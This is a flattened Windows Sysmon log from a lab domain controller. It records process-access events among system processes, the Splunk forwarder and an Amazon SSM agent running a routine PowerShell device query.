09:20:21.831{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054082Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.831{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054081Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.831{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054080Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.831{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054079Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.831{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054078Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.831{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054077Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.830{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054076Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.830{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054075Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.830{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054074Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.830{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD5-6151-6200-00000000FD01}3396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054073Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.829{5EBD8912-8CD2-6151-4300-00000000FD01}37603936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{5EBD8912-8CD5-6151-6200-00000000FD01}3396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+6f23e 154100x80000000000000001054072Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.830{5EBD8912-8CD5-6151-6200-00000000FD01}3396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPEntity | Where-Object { $_.Service -eq 'xenvbd' }" "| Select-Object" DeviceID "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000001054071Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.796{5EBD8912-8CBD-6151-0B00-00000000FD01}6402908C:\Windows\system32\lsass.exe{5EBD8912-8CD5-6151-6000-00000000FD01}3484C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054070Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.796{5EBD8912-8CBD-6151-0B00-00000000FD01}6402908C:\Windows\system32\lsass.exe{5EBD8912-8CD5-6151-6000-00000000FD01}3484C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054069Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.796{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD5-6151-6100-00000000FD01}3940C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054068Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.794{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054067Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.794{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054066Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.794{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054065Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.793{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054064Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.793{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054063Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.793{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054062Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.793{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054061Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.793{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054060Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.793{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054059Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.793{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD5-6151-6100-00000000FD01}3940C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054058Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.792{5EBD8912-8CD0-6151-3000-00000000FD01}19563432C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CD5-6151-6100-00000000FD01}3940C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054057Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 